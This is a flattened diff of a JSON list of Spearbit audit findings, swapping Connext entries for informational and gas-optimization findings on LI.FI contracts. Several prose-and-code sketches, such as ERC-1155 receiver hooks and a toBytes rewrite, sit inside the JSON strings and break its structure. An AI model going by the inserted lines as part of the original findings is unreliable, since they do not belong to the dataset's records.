"https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The field hasSourceSwaps can be removed from the struct BridgeData.
_swapData is enough to identify if source swaps are needed.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Elaborate TypedMemView encoding in comments", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "TypedMemView describes its encoding in comments as: // next 12 are memory address // next 12 are len // bottom 3 bytes are empty The comments can be elaborated to make them less ambiguous.", + "title": "Unnecessary validation argument for native token amount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Since both msg.value and feeAmount are controlled by the caller, you can remove feeAmount as an argument and assume msg.value is what needs to be collected. This will save gas on comparing these two values and refunding the extra.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Remove Curve StableSwap paper URL", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "www.curve.fi/stableswap-paper.pdf The current working URL is curve.fi/files/stableswap-paper.pdf. to Curve StableSwap paper referenced in comments Link is no longer active:", + "title": "Restrict access for cBridge refunds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "cBridge refunds need to be triggered from the contract that sent the transaction to cBridge. This can be done using the executeCallAndWithdraw function. As the function is not cBridge-specific, it can make arbitrary calls from the Diamond contract. Restricting what that function can call would allow more secure automation of refunds.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Missing Validations in AmplificationUtils.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "1. If initialAPrecise=futureAPrecise then there will not be any ramping. 2. In stopRampA function, self.futureATime > block.timestamp can be revised to self.futureATime >= block.timestamp since once current timestamp has reached futureATime, futureAprice will be returned al- ways.", + "title": "Stargate now supports multiple pools for the same token", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The Stargate protocol now supports multiple pools for the same token on the same chain, each pool may be connected to one or many other chains. It is not possible to store a one-to-one token-to-pool mapping.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Incorrect PriceSource is returned", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Price Source is returned incorrectly in case of stale prices as shown below 1. getTokenPrice function is called with _tokenAddress T1. 2. Assume the direct price is stale, so tokenPrice is set to 0.
uint256 tokenPrice = assetPrices[tokenAddress].price; if (tokenPrice != 0 && ((block.timestamp - assetPrices[tokenAddress].updatedAt) <= VALID_PERIOD)) { return (tokenPrice, uint256(PriceSource.DIRECT)); } else { tokenPrice = 0; } 3. Now contract tries to retrieve price from oracle. In case the price is outdated, the returned price will again be 0 and source would be set to PriceSource.CHAINLINK. if (tokenPrice == 0) { tokenPrice = getPriceFromOracle(tokenAddress); source = PriceSource.CHAINLINK; } 128 4. Assuming v1PriceOracle is not yet set, contract will simply return the price and source which in this case is 0, PriceSource.CHAINLINK. In this case amount is correct but source is not correct. return (tokenPrice, uint256(source));", + "title": "Expose receiver in GenericSwapFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Unlike the bridge facets, the swap facet does not yet emit the receiver of a transaction.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "PriceSource.DEX is never used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The enum value DEX is never used in the contract and can be removed.", + "title": "Track the destination chain on ServiceFeeCollector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "ServiceFeeCollector collects gas fees to send to the destination chain. For example: /// @param receiver The address to send gas to on the destination chain function collectTokenGasFees( address tokenAddress, uint256 feeAmount, address receiver ) However, the destination chain is never tracked in the contract.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Incorrect comment about handleOutgoingAsset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The comment is incorrect as this function does not transfer funds to msg.sender. /** * @notice Handles transferring funds from the Connext contract to msg.sender. * @param _asset - The address of the ERC20 token to transfer. * @param _to - The recipient address that will receive the funds. * @param _amount - The amount to withdraw from contract. */ function handleOutgoingAsset( address _asset, address _to, uint256 _amount ) internal {", + "title": "Executor can reuse SwapperV2 functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Executor.sol's noLeftOvers and _fetchBalances() are copied from SwapperV2.sol.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "SafeMath is not required for Solidity 0.8.x", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Solidity 0.8.x has a built-in mechanism for dealing with overflows and underflows, so there is no need to use the SafeMath library", + "title": "Consider adding onERC1155Received", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "In addition to ERC721, NFTs can be created using the ERC1155 standard.
Since the use case of purchasing an NFT has to be supported, support for ERC1155 tokens can be added.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Use a deadline check modifier in ProposedOwnable", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Any change in ownership through acceptProposedOwner() and renounceOwnership() has to go through a deadline check: // Ensure delay has elapsed if ((block.timestamp - _proposedOwnershipTimestamp) <= _delay) revert ProposedOwnable__acceptProposedOwner_delayNotElapsed(); This check can be extracted out in a modifier for readability.", + "title": "SquidFacet uses a different string encoding library", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "SquidFacet uses an OZ library to convert address to string, whereas the underlying bridge uses a different library. Fuzzing showed that these implementations are equivalent.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Use ExcessivelySafeCall in SpokeConnector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The low-level call code highlighted code above looks to be copied from ExcessivelySafeCall.sol. replacing this low-level call with the function call ExcessivelySafe- Consider", + "title": "Assembly in StargateFacet can be replaced with Solidity", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function toBytes() contains assembly code that can also be replaced with Solidity code. Also, see how-to-convert-an-address-to-bytes-in-solidity. function toBytes(address _address) private pure returns (bytes memory) { bytes memory tempBytes; assembly { let m := mload(0x40) _address := and(_address,0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF) mstore(add(m, 20),xor(0x140000000000000000000000000000000000000000, _address) ) mstore(0x40, add(m, 52)) tempBytes := m } return tempBytes; }
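For the onERC1155Received suggestion above, a minimal sketch of the two receiver hooks. The returned selector values are fixed by the ERC-1155 standard.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Illustrative sketch of the ERC-1155 receiver hooks.
contract ERC1155ReceiverSketch {
    function onERC1155Received(address, address, uint256, uint256, bytes calldata)
        external pure returns (bytes4)
    {
        return this.onERC1155Received.selector; // 0xf23a6e61
    }

    function onERC1155BatchReceived(address, address, uint256[] calldata, uint256[] calldata, bytes calldata)
        external pure returns (bytes4)
    {
        return this.onERC1155BatchReceived.selector; // 0xbc197c81
    }
}
```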
}", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "s.LIQUIDITY_FEE_NUMERATOR might change while a cross-chain transfer is in-flight.", + "title": "Doublecheck quoteLayerZeroFee()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function quoteLayerZeroFee uses msg.sender to determine a fee, while _startBridge() uses _bridgeData.receiver to execute router.swap. This might give different results. function quoteLayerZeroFee(...) ... { return router.quoteLayerZeroFee( ... , toBytes(msg.sender) ); } function _startBridge(...) ... router.swap{ value: _stargateData.lzFee }(..., toBytes(_bridgeData.receiver), ... ); ... }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "The constant expression for EMPTY_HASH can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "EMPTY_HASH is a constant with a value equal to: hex\"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470\", which is the keccak256 of an empty bytes. We can replace this constant hex literal with a more readable alternative.", + "title": "Missing modifier refundExcessNative()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function swapAndStartBridgeTokensViaXDaiBridge() of GnosisBridgeFacet() and GnosisBridgeL2Facet() doesn't have the modifier refundExcessNative(), while other facets do.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Simplify and add more documentation for getTokenPrice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "getTokenPrice can be simplified and it can try to return early whenever possible.", + "title": "Special case for cfUSDC tokens in CelerIMFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function startBridgeTokensViaCelerIM() has a special case for cfUSDC tokens, whereas swapAndStartBridgeTokensViaCelerIM() doesn't have this. function startBridgeTokensViaCelerIM(...) ... { if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { if (...) { // special case for cfUSDC token asset = IERC20(CelerToken(_bridgeData.sendingAssetId).canonical()); } else { ... } } ... } function swapAndStartBridgeTokensViaCelerIM(...) ... { ... if (!LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { // no special case for cfUSDC token } ... }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Remove unused code, files, interfaces, libraries, contracts, ...", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The codebase includes code, files, interfaces, libraries, and contracts that are no longer in use.", + "title": "External calls of SquidFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The functions bridgeCall and callBridgeCall make arbitrary external calls. This is done via a separate multicall contract, SquidMulticall. This might be used to attempt reentrancy attacks. function _startBridge(...) ... { ... squidRouter.bridgeCall{ value: msgValue }(...); ... squidRouter.callBridgeCall{ value: msgValue }(...); ...
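For the StargateFacet toBytes() note above, a minimal sketch of the suggested Solidity replacement; abi.encodePacked(address) produces the same 20-byte array as the assembly version.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Illustrative sketch of toBytes() without assembly.
contract ToBytesSketch {
    function toBytes(address _address) internal pure returns (bytes memory) {
        return abi.encodePacked(_address); // 20 bytes, identical to the assembly
    }
}
```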
}", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "_calculateSwapInv and _calculateSwap can mirror each other's calculations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "_calculateSwapInv could have mirrored the implementation of _calculateSwap uint256 y = xp[tokenIndexTo] - (dy * multipliers[tokenIndexTo]); uint256 x = getY(_getAPrecise(self), tokenIndexTo, tokenIndexFrom, y, xp); Or the other way around _calculateSwap mirror _calculateSwapInv and pick whatever is cheaper.", + "title": "Missing test coverage for triggerRefund function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The current test suite does not include test cases for the triggerRefund function. This oversight may lead to undetected bugs or unexpected behavior in the function's implementation.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document that the virtual price of a stable swap pool might not be constant", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The virtual price of the LP token is not constant when the amplification coefficient is ramping even when/if token balances stay the same.", + "title": "Implicit assumption in MakerTeleportFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function _startBridge() of MakerTeleportFacet has the implicit assumption that dai is an ERC20 token. However, on GnosisChain the native asset is (x)dai. Note: DAI on GnosisChain is an ERC20, so it is unlikely this would be a problem in practice. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai),...); ... }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document the reason for picking d is the starting point for calculating getYD using the Newton's method.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "d the stable swap invariant passed to getYD as a parameter and it is used as the starting point of the Newton method to find a root. This root is the value/price for the tokenIndex token that would stabilize the pool so that it would statisfy the stable swap invariant equation.", + "title": "Robust allowance handling in maxApproveERC20()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Some tokens, like USDT, require setting the approval to 0 before setting it to another value. The function SafeERC20.safeIncreaseAllowance() doesn't do this. Luckily maxApproveERC20() sets the allowance so high that in practice this never has to be increased. function maxApproveERC20(...) ... { ...
uint256 allowance = assetId.allowance(address(this), spender); if (allowance < amount) SafeERC20.safeIncreaseAllowance(IERC20(assetId), spender, MAX_UINT - allowance); }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document the max allowed tokens in stable swap pools used", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Based on the uint8 type for the indexes of tokens in different stable swap pools, it is inferred that the max possible number of tokens that can exist in a pool is 256. There is the following check when initializing internal pools: if (_pooledTokens.length <= 1 || _pooledTokens.length > 32) revert SwapAdminFacet__initializeSwap_invalidPooledTokens(); This means the internal pools can only have number of pooled tokens in 2, (cid:1) (cid:1) (cid:1) , 32.", + "title": "Unused re-entrancy guard", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "RelayerCelerIM.sol#L21 includes a re-entrancy guard meant to add an extra layer of protection against re-entrancy attacks. While re-entrancy guards are crucial for securing contracts, this particular guard is never used.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Rename adoptedToLocalPools to better indicate what it represents", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "adoptedToLocalPools is used to keep track of external pools where one can swap between different variations of a token. But one might confuse this mapping as holding internal stable swap pools.", + "title": "Redundant duplicate import in the LIFuelFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The current LIFuelFacet.sol contains a redundant duplicate import. Identifying and removing duplicate imports can streamline the contract and improve maintainability.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document the usage of commented mysterious numbers in AppStorage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Before each struct AppStorage's field definition there is a line comment consisting of only digits // xx One would guess they might be relative slot indexes in the storage (relative to AppStorage's slot). But the numbers are not consistent.", + "title": "Extra checks in executeMessageWithTransfer()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function executeMessageWithTransfer() of RelayerCelerIM ignores the first parameter. It seems this could be used to verify the origin of the transaction, which could be an extra security measure. * @param * (unused) The address of the source app contract function executeMessageWithTransfer(address, ...) ... 
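// Hedged sketch (hypothetical names, not LI.FI code): the ignored first
// argument identifies the source app contract, so the body could verify it:
//   function executeMessageWithTransfer(address sender_, ...) ... {
//       require(sender_ == trustedSourceApp, "untrusted source app");
//       ...
//   }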
{ }", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "RouterPermissionsManagerInfo can be packed differently for readability", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "RouterPermissionsManagerInfo has multiple fields that are each a mapping of address to a differ- ent value. The address here represents a liquidity router address. It would be more readable to pack these values such that only one mapping is used. This would also indicate how all these mapping have the same shared key which is the router.", + "title": "Variable visibility is not uniform", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "In the current facets, state variables like router/messenger visibilities are not uniform, with some variables declared as public while others are private. thorchainRouter => is defined as public. synapseRouter => is defined as public. deBridgeGate => is defined as private", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Consolidate TokenId struct into a file that can be imported in relevant files", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "TokenId struct is defined both in BridgeMessage and LibConnextStorage with the same struc- ture/fields. If in future, one would need to update one struct the other one should also be updated in parallel.", + "title": "Library LibMappings not used everywhere", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The library LibMappings is used in several facets. However, it is not used in the following facets ReentrancyGuard AxelarFacet HopFacet.sol MultichainFacet OptimismBridgeFacet OwnershipFacet", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] - }, - { - "title": "Typos, grammatical and styling errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "There are a few typos and grammatical mistakes that can be corrected in the codebase.", + }, + { + "title": "transferERC20() doesn't have a null address check for receiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "LibAsset.transferFromERC20() has a null address check on the receiver, but transferERC20() does not.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Keep consistent return parameters in calculateSwapToLocalAssetIfNeeded", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "All return paths in calculateSwapToLocalAssetIfNeeded except one return _local as the 2nd return parameter. 
It would be best for readability and consistency change the following code to follow the same pattern if (_asset == _local) { return (_amount, _asset); }", + "title": "LibBytes can be improved", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The following functions are not used: concat(), concatStorage(), equal(), equalStorage(), toBytes32(), toUint128(), toUint16(), toUint256(), toUint32(), toUint64(), toUint8(), toUint96(). The call to function slice() for calldata arguments (as done in AxelarExecutor) can be replaced with the in-built slicing provided by Solidity. Refer to its documentation.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Fix/add or complete missing NatSpec comments.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Some NatSpec comments are either missing or are incomplete.", + "title": "Keep generic errors in the GenericErrors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "During the code review, it has been noticed that some of the contracts re-define errors. Generic errors like WithdrawFailed can be kept in GenericErrors.sol.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Define and use constants for different literals used in the codebase.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Throughout the project, a few literals have been used. It would be best to define a named constant for those. That way it would be more clear the purpose of those values used and also the common literals can be consolidated into one place.", + "title": "Attention points for making the Diamond immutable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "There are additional attention points to decide upon when making the Diamond immutable: After removing the Owner, the following functions won't work anymore: AccessManagerFacet.sol - setCanExecute() AxelarFacet.sol - setChainName() HopFacet.sol - registerBridge() MultichainFacet.sol - updateAddressMappings() & registerRouters() OptimismBridgeFacet.sol - registerOptimismBridge() PeripheryRegistryFacet.sol - registerPeripheryContract() StargateFacet.sol - setStargatePoolId() & setLayerZeroChainId() WormholeFacet.sol - setWormholeChainId() & setWormholeChainIds() There is another authorization mechanism via LibAccess, which arranges access to the functions of DexManagerFacet.sol and WithdrawFacet.sol. Several Periphery contracts also have an Owner: AxelarExecutor.sol ERC20Proxy.sol Executor.sol FeeCollector.sol Receiver.sol RelayerCelerIM.sol ServiceFeeCollector.sol Additionally, ERC20Proxy has an authorization mechanism via authorizedCallers[].", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Enforce using adopted for the returned parameter in swapFromLocalAssetIfNeeded... 
for consis- tency.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The other return paths in swapFromLocalAssetIfNeeded, swapFromLocalAssetIfNeededForEx- actOut and calculateSwapFromLocalAssetIfNeeded use the adopted parameter as one of the return value com- ponents. It would be best to have all the return paths do the same thing. Note swapFromLocalAssetIfNeeded and calculateSwapFromLocalAssetIfNeeded should always return (_, adopted) and swapFromLocalAssetIfNeededForExactOut should always return (_, _, adopted).", + "title": "Check on the final asset in _swapData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "MakerTeleportFacet verifies that the final received asset in _swapData is DAI. This check is not present in the majority of the facets (including CircleBridgeFacet). Ideally, every facet should have the check that the final receivingAssetId is equal to sendingAssetId.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Use interface types for parameters instead of casting to the interface type multiple times", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Sometimes casting to the interface type has been performed multiple times. It will be cleaner if the parameter is defined as having that interface and avoid unnecessary casts.", + "title": "Discrepancies in pragma versioning across facet implementations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The use of different pragma versions in facet implementations can present several implications, with potential risks and compliance concerns that need to be addressed to maintain robust and compliant contracts.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Be aware of tokens with multiple addresses", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "If a token has multiple addresses (see weird erc20) then the token cap might have an unexpected effect, especially if the two addresses have a different cap. function _addLiquidityForRouter(...) ... { ... if (s.domain == canonical.domain) { // Sanity check: caps not reached uint256 custodied = IERC20(_local).balanceOf(address(this)) + _amount; uint256 cap = s.caps[key]; if (cap > 0 && custodied > cap) { revert RoutersFacet__addLiquidityForRouter_capReached(); } } ... }", + "title": "Inconsistent use of validateDestinationCallFlag()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The highlighted code can be replaced with a call to the validateDestinationCallFlag() function, as done in other facets.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Remove old references to claims", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The contract RelayerFacet still has some references to claims. These are a residue from a previous version and are not used currently. 
error RelayerFacet__initiateClaim_emptyClaim(); error RelayerFacet__initiateClaim_notRelayer(bytes32 transferId); event InitiatedClaim(uint32 indexed domain, address indexed recipient, address caller, bytes32[] transferIds); ,! event Claimed(address indexed recipient, uint256 total, bytes32[] transferIds);", + "title": "Inconsistent utilization of the isNativeAsset function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The isNativeAsset function is designed to distinguish native assets from other tokens within facet-based smart contract implementations. However, it has been observed that the usage of the isNativeAsset function is not consistent across various facets. Ensuring uniform application of this function is crucial for maintaining the accuracy and reliability of the asset identification and processing within the facets.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Doublecheck references to Nomad", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The code refers to nomad several times in a way that is currently not accurate. This could be confusing to the maintainers and readers of the code. This includes the following examples: BridgeFacet.sol:419: * @notice Initiates a cross-chain transfer of funds, calldata, and/or various named properties using the nomad ,! BridgeFacet.sol:423: * assets will be swapped for their local nomad asset counterparts (i.e. bridgeable tokens) via the configured AMM if swap is needed. The local tokens will * necessary. In the event that the adopted assets *are* local nomad assets, no ,! BridgeFacet.sol:424: ,! InboxFacet.sol:87: RoutersFacet.sol:533: AssetLogic.sol:102: asset. ,! AssetLogic.sol:139: swap ,! AssetLogic.sol:185: swap ,! AssetLogic.sol:336: adopted asset ,! AssetLogic.sol:375: * @notice Only accept messages from an Nomad Replica contract. * @param _local - The address of the nomad representation of the asset * @notice Swaps an adopted asset to the local (representation or canonical) nomad * @notice Swaps a local nomad asset for the adopted asset using the stored stable * @notice Swaps a local nomad asset for the adopted asset using the stored stable * @notice Calculate amount of tokens you receive on a local nomad asset for the * @notice Calculate amount of tokens you receive of a local nomad asset for the adopted asset ,! LibConnextStorage.sol:54: * @param receiveLocal - If true, will use the local nomad asset on the destination instead of adopted. ,! LibConnextStorage.sol:148: madUSDC on polygon). ,! LibConnextStorage.sol:204: LibConnextStorage.sol:268: madUSDC on polygon) * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> * this domain (the nomad local asset). * @dev Swaps for an adopted asset <> nomad local asset (i.e. POS USDC <> ,! ConnectorManager.sol:11: * @dev Each nomad router contract has a `XappConnectionClient`, which ,! references a 142", + "title": "Unused events/errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The contracts contain several events and error messages that are not used anywhere in the contract code. 
These unused events and errors add unnecessary code to the contract, increasing its size.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Document usage of Nomad domain schema", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The library LibConnextStorage specifies that the domains are compatible with the nomad domain schema. However other locations don't mention this. This is especially important during the enrollment of new domains. * @param originDomain - The originating domain (i.e. where `xcall` is called). Must match nomad domain schema ,! * @param destinationDomain - The final domain (i.e. where `execute` / `reconcile` are called). Must match nomad domain schema ,! struct TransferInfo { uint32 originDomain; uint32 destinationDomain; ... }", + "title": "Make bridge parameters dynamic by keeping them as a parameter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The current implementation has some bridge parameters hardcoded within the smart contract. This approach limits the flexibility of the contract and may cause issues in the future when upgrades or changes to the bridge parameters are required. It would be better to keep the bridge parameters as a parameter to make them dynamic and easily changeable in the future. HopFacetOptimized.sol => Relayer & RelayerFee. MakerTeleportFacet.sol => Operator: the person (or specified third party) responsible for initiating the minting process on the destination domain by providing (in the fast path) Oracle attestations.", "labels": [ "Spearbit", - "ConnextNxtp", + "LIFI-retainer1", "Severity: Informational" ] }, { - "title": "Router has multiple meanings", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The term router is used for three different concepts. This is confusing for maintainers and readers of the code: A) The router that provides Liquidity and signs bids * `router` - this is the address that will sign bids sent to the sequencer B) The router that can add new routers 